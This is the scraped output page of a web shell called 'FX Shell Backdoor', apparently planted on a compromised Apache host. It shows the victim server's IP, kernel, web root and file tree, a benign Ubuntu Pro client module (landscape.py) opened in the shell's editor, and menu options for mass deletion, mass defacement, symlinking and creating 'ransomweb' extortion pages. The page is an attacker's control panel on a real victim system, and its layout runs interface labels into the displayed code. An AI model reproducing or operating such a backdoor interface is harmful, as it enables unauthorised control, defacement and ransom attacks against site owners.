FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
python3
/
dist-packages
/
uaclient
/
entitlements
/
Upload
Buat File
Buat Folder
Buat Ransomweb
import logging import os from typing import Any, Dict, Optional, Tuple from uaclient import apt, event_logger, exceptions, messages, system, util from uaclient.entitlements.base import UAEntitlement from uaclient.entitlements.entitlement_status import ApplicationStatus LOG = logging.getLogger(util.replace_top_level_logger_name(__name__)) event = event_logger.get_event_logger() LANDSCAPE_CLIENT_PACKAGE_NAME = "landscape-client" LANDSCAPE_CLIENT_CONFIG_PATH = "/etc/landscape/client.conf" LANDSCAPE_CLIENT_CONFIG_PATH_DISABLE_BACKUP = ( "/etc/landscape/client.conf.pro-disable-backup" ) class LandscapeEntitlement(UAEntitlement): name = "landscape" title = "Landscape" description = "Management and administration tool for Ubuntu" help_doc_url = "https://ubuntu.com/landscape" def _perform_enable(self, silent: bool = False) -> bool: cmd = ["landscape-config"] + self.extra_args if self.assume_yes and "--silent" not in cmd: cmd += ["--silent"] LOG.debug(messages.EXECUTING_COMMAND.format(" ".join(cmd))) event.info( util.redact_sensitive_logs( messages.EXECUTING_COMMAND.format(" ".join(cmd)) ) ) try: system.subp(cmd, pipe_stdouterr=self.assume_yes) except exceptions.ProcessExecutionError as e: if self.assume_yes: err_msg = messages.LANDSCAPE_CONFIG_FAILED event.error( err_msg.msg, err_msg.name, service=self.name, additional_info={ "stdout": e.stdout.strip(), "stderr": e.stderr.strip(), }, ) event.info(e.stderr.strip()) event.info( messages.ENABLED_FAILED.format(title=self.title).msg ) return False if self.assume_yes: # when silencing landscape-config, include a success message # otherwise, let landscape-config say what happened event.info(messages.ENABLED_TMPL.format(title=self.title)) return True def _perform_disable(self, silent: bool = False) -> bool: cmd = ["landscape-config", "--disable"] event.info(messages.EXECUTING_COMMAND.format(" ".join(cmd))) try: system.subp(cmd) except exceptions.ProcessExecutionError as e: with util.disable_log_to_console(): LOG.error(e) event.info(str(e).strip()) event.warning(str(e), self.name) msg = messages.BACKING_UP_FILE.format( original=LANDSCAPE_CLIENT_CONFIG_PATH, backup=LANDSCAPE_CLIENT_CONFIG_PATH_DISABLE_BACKUP, ) LOG.debug(msg) event.info(msg) try: os.rename( LANDSCAPE_CLIENT_CONFIG_PATH, LANDSCAPE_CLIENT_CONFIG_PATH_DISABLE_BACKUP, ) except FileNotFoundError as e: with util.disable_log_to_console(): LOG.error(e) event.info(str(e)) event.warning(str(e), self.name) return True def application_status( self, ) -> Tuple[ApplicationStatus, Optional[messages.NamedMessage]]: if apt.is_installed(LANDSCAPE_CLIENT_PACKAGE_NAME): return (ApplicationStatus.ENABLED, None) else: return ( ApplicationStatus.DISABLED, messages.LANDSCAPE_CLIENT_NOT_INSTALLED, ) def enabled_warning_status( self, ) -> Tuple[bool, Optional[messages.NamedMessage]]: if not os.path.exists(LANDSCAPE_CLIENT_CONFIG_PATH): return ( True, messages.LANDSCAPE_NOT_CONFIGURED, ) # This check wrongly gives warning when non-root if util.we_are_currently_root(): try: system.subp( ["landscape-config", "--is-registered", "--silent"] ) except exceptions.ProcessExecutionError: return ( True, messages.LANDSCAPE_NOT_REGISTERED, ) if not system.is_systemd_unit_active("landscape-client"): return ( True, messages.LANDSCAPE_SERVICE_NOT_ACTIVE, ) return False, None def process_contract_deltas( self, orig_access: Dict[str, Any], deltas: Dict[str, Any], allow_enable: bool = False, ) -> bool: # overriding allow_enable to always be False for this entitlement # effectively prevents enableByDefault from ever happening return super().process_contract_deltas( orig_access, deltas, allow_enable=False )
__pycache__
Choose...
Rename
Delete
Now
__init__.py
Choose...
Edit
Rename
Delete
Now
__pycache__
Choose...
Edit
Rename
Delete
Now
anbox.py
Choose...
Edit
Rename
Delete
Now
base.py
Choose...
Edit
Rename
Delete
Now
cc.py
Choose...
Edit
Rename
Delete
Now
cis.py
Choose...
Edit
Rename
Delete
Now
entitlement_status.py
Choose...
Edit
Rename
Delete
Now
esm.py
Choose...
Edit
Rename
Delete
Now
fips.py
Choose...
Edit
Rename
Delete
Now
landscape.py
Choose...
Edit
Rename
Delete
Now
livepatch.py
Choose...
Edit
Rename
Delete
Now
realtime.py
Choose...
Edit
Rename
Delete
Now
repo.py
Choose...
Edit
Rename
Delete
Now
ros.py
Choose...
Edit
Rename
Delete
Now